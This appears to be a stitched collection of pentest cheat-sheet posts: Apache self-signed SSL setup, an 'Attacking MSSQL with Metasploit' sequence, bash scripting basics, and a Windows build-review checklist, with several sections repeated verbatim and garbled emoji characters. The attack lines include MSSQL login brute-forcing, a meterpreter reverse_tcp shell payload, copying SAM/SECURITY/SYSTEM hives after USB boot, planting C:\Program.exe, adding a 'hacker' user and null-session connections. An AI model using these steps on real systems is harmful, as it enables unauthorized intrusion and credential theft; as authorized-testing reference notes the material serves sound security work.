https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
π¦BUILD YOUR OWN ApacheSSL:
# Enabling self-signed certificates on a local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate a self-signed SSL certificate and its private key:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Enable the default-ssl site by creating a symbolic link:
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
π¦AttackingMSSQL -
Attacking MSSQL with Metasploit
Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
[>] Enumerate MSSQL Database:
msf > use auxiliary/admin/mssql/mssql_enum
[>] Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
π¦Simple Bash Scripting :
+ nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of text.
ctrl x Exit editor.
+ Create a text file:
touch file Creates an empty file.
ifconfig > tmp Redirect the output of a command into a file.
nano file
+ Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp
+ How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
+ pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
+ Processes
ps aux Show all running processes for all users.
kill -9 PID Forcibly kill a PID (SIGKILL cannot be caught or ignored by the process).
+ Word Count
wc -l tmp2 Count the number of lines in a file
+ cut
-d delimiter
-f fields
+ sort
Sort and keep only unique lines: sort -u file
Sort IP addresses numerically, octet by octet: sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
+ awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
+ grep
grep -v Exclude lines containing a string.
grep -v 'red' file
+ egrep -v
Exclude lines matching any of several strings: egrep -v '(red|white|blue)' file
+ sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
π¦Simple Bash Scripting :
+ nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of text.
ctrl x Exit editor.
+ Create a text file:
touch file Creates an empty file.
ifconfig > tmp Redirect the output of a command into a file.
nano file
+ Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp
+ How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
+ pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
+ Processes
ps aux Show all running processes for all users.
kill -9 PID Forcibly kill a PID (SIGKILL cannot be caught or ignored by the process).
+ Word Count
wc -l tmp2 Count the number of lines in a file
+ cut
-d delimiter
-f fields
+ sort
Sort and keep only unique lines: sort -u file
Sort IP addresses numerically, octet by octet: sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
+ awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
+ grep
grep -v Exclude lines containing a string.
grep -v 'red' file
+ egrep -v
Exclude lines matching any of several strings: egrep -v '(red|white|blue)' file
+ sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
π¦Create a Bash Scripts Example :
+ Simple bash script:
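#!/bin/bash
# Minimal example script: clear the terminal, print two blank lines, then greet.
clear
echo
echo
# `print` is not a shell builtin (on Debian-family systems it is a printer
# spooler command); `echo` writes the text to stdout.
echo "Hello world."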
+ Make a file executable.
chmod +x file
chmod 755 file
+ Variables
# Shell variables: assignment has no spaces around `=`, expansion uses `$`.
name=Bob
echo "$name"
# Command substitution stores a command's output in a variable.
user=$(whoami)
echo "$user"
echo "Hello $name. You are running as $user."
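#!/bin/bash
# Example: greet the user and show the machine's IP address.
clear
echo "Hello World"
name=Bob
# The command substitution must sit on the same line as the assignment;
# a bare `ip=` leaves $ip empty.
# NOTE(review): the "Bcast:" pattern matches older net-tools ifconfig output;
# newer versions print "broadcast", so the grep may need adjusting.
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
echo "Hello" $name "Your IP address is:" $ip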
+ User Input
read -p "Domain: " domain
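#!/bin/bash
# Prompt for a domain name and ping it five times.
echo "Please input your domain:"
# `-r` keeps backslashes in the input literal.
read -r -p "Domain:" domain
# Quote the expansion so a value containing spaces or glob characters is
# passed to ping as a single argument rather than split and expanded.
ping -c 5 "$domain"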
+ Check For No User Input
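# Abort when the user entered nothing: `-z` is only valid inside a test
# bracket (`[ ... ]`), and the expansion is quoted so an empty value still
# yields a well-formed test.
if [ -z "$domain" ]; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
# Non-zero status so callers and `&&` chains see the failure.
exit 1
fi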
+ For loops
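#!/bin/bash
# Run one command per line of hosts.txt. Reading the file line by line
# avoids the word-splitting and glob expansion that `$(cat hosts.txt)` is
# subject to; `-r` keeps backslashes literal.
while IFS= read -r host; do
your_command "$host"  # replace with the command to run against each host
done < hosts.txt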
+ One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
Use a bash loop to find the IP address behind each host:
for url in $(cat list.txt); do host $url; done
+ Condition Onliner
any_command && runs-if-it-succeeded || runs-if-it-failed
type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"
+ Condition Onliner with multiple action
any_command && { if work; also this; also this; } || { if not work; also this; also this; }
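# In a brace group the last command must be terminated with `;` (or a
# newline) before the closing `}`, otherwise bash reports a syntax error.
type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass; } || { echo "MassDns not installed"; echo "Install MassDns"; }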
π¦Create a Bash Scripts Example :
+ Simple bash script:
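#!/bin/bash
# Minimal example script: clear the terminal, print two blank lines, then greet.
clear
echo
echo
# `print` is not a shell builtin (on Debian-family systems it is a printer
# spooler command); `echo` writes the text to stdout.
echo "Hello world."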
+ Make a file executable.
chmod +x file
chmod 755 file
+ Variables
# Shell variables: assignment has no spaces around `=`, expansion uses `$`.
name=Bob
echo "$name"
# Command substitution stores a command's output in a variable.
user=$(whoami)
echo "$user"
echo "Hello $name. You are running as $user."
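#!/bin/bash
# Example: greet the user and show the machine's IP address.
clear
echo "Hello World"
name=Bob
# The command substitution must sit on the same line as the assignment;
# a bare `ip=` followed by the pipeline on the next line leaves $ip empty
# and merely prints the pipeline's output.
# NOTE(review): the "Bcast:" pattern matches older net-tools ifconfig output;
# newer versions print "broadcast", so the grep may need adjusting.
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)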
echo "Hello" $name "Your IP address is:" $ip
+ User Input
read -p "Domain: " domain
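#!/bin/bash
# Prompt for a domain name and ping it five times.
echo "Please input your domain:"
# `-r` keeps backslashes in the input literal.
read -r -p "Domain:" domain
# Quote the expansion so a value containing spaces or glob characters is
# passed to ping as a single argument rather than split and expanded.
ping -c 5 "$domain"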
+ Check For No User Input
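# Abort when the user entered nothing: `-z` is only valid inside a test
# bracket (`[ ... ]`), and the expansion is quoted so an empty value still
# yields a well-formed test.
if [ -z "$domain" ]; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
# Non-zero status so callers and `&&` chains see the failure.
exit 1
fi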
+ For loops
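#!/bin/bash
# Run one command per line of hosts.txt. Reading the file line by line
# avoids the word-splitting and glob expansion that `$(cat hosts.txt)` is
# subject to; `-r` keeps backslashes literal.
while IFS= read -r host; do
your_command "$host"  # replace with the command to run against each host
done < hosts.txt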
+ One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
Use a bash loop to find the IP address behind each host:
for url in $(cat list.txt); do host $url; done
+ Condition Onliner
any_command && runs-if-it-succeeded || runs-if-it-failed
type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"
+ Condition Onliner with multiple action
any_command && { if work; also this; also this; } || { if not work; also this; also this; }
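# In a brace group the last command must be terminated with `;` (or a
# newline) before the closing `}`, otherwise bash reports a syntax error.
type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass; } || { echo "MassDns not installed"; echo "Install MassDns"; }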
π¦ A good guide helpful Build Review :
+ Main tasks:
Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign Eicar test file.
USB policy and removable media access (including firewire, CD etc).
Disk encryption (if relevant)
BIOS passwords set.
Proxy settings (if relevant).
Nessus Scan (With Credentials).
+ Windows Hosts:
+ Server Roles
+ Server Manager
+ System Properties
+ Default Domain Policy
+ Global Domain Policy
+ Net accounts/Users/groups/Administrators
+ IPConfig/Routing
+ Installed Programs
+ Installed System Updates
+ AV Version/Definition Dates
+ Check Computer folders
+ Firewall Configuration
+ Audit Policy
+ Password/Lockout Policy
+ Security Policy
+ User Rights Policy
π¦ A good guide helpful Build Review :
+ Main tasks:
Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign Eicar test file.
USB policy and removable media access (including firewire, CD etc).
Disk encryption (if relevant)
BIOS passwords set.
Proxy settings (if relevant).
Nessus Scan (With Credentials).
+ Windows Hosts:
+ Server Roles
+ Server Manager
+ System Properties
+ Default Domain Policy
+ Global Domain Policy
+ Net accounts/Users/groups/Administrators
+ IPConfig/Routing
+ Installed Programs
+ Installed System Updates
+ AV Version/Definition Dates
+ Check Computer folders
+ Firewall Configuration
+ Audit Policy
+ Password/Lockout Policy
+ Security Policy
+ User Rights Policy
π¦Helpful systeminfo command
#requested
1οΈβ£BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (eg calc)
2οΈβ£Control Panel
- Windows Firewall
- enabled
- editable
- logs
- System Info
- Windows Update
3οΈβ£Anti-Virus
- config
- logs
- version
- dates
- EICAR
4οΈβ£cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add
- regedit
- ping
- sched
- tracert
- net use \\IP addressorhost name\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist
5οΈβ£mount usb
usb autostart
6οΈβ£copy over files
- nc
- enum
- nmap
- DIRE
- EICAR
π¦Helpful systeminfo command
#requested
1οΈβ£BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (eg calc)
2οΈβ£Control Panel
- Windows Firewall
- enabled
- editable
- logs
- System Info
- Windows Update
3οΈβ£Anti-Virus
- config
- logs
- version
- dates
- EICAR
4οΈβ£cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add
- regedit
- ping
- sched
- tracert
- net use \\IP addressorhost name\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist
5οΈβ£mount usb
usb autostart
6οΈβ£copy over files
- nc
- enum
- nmap
- DIRE
- EICAR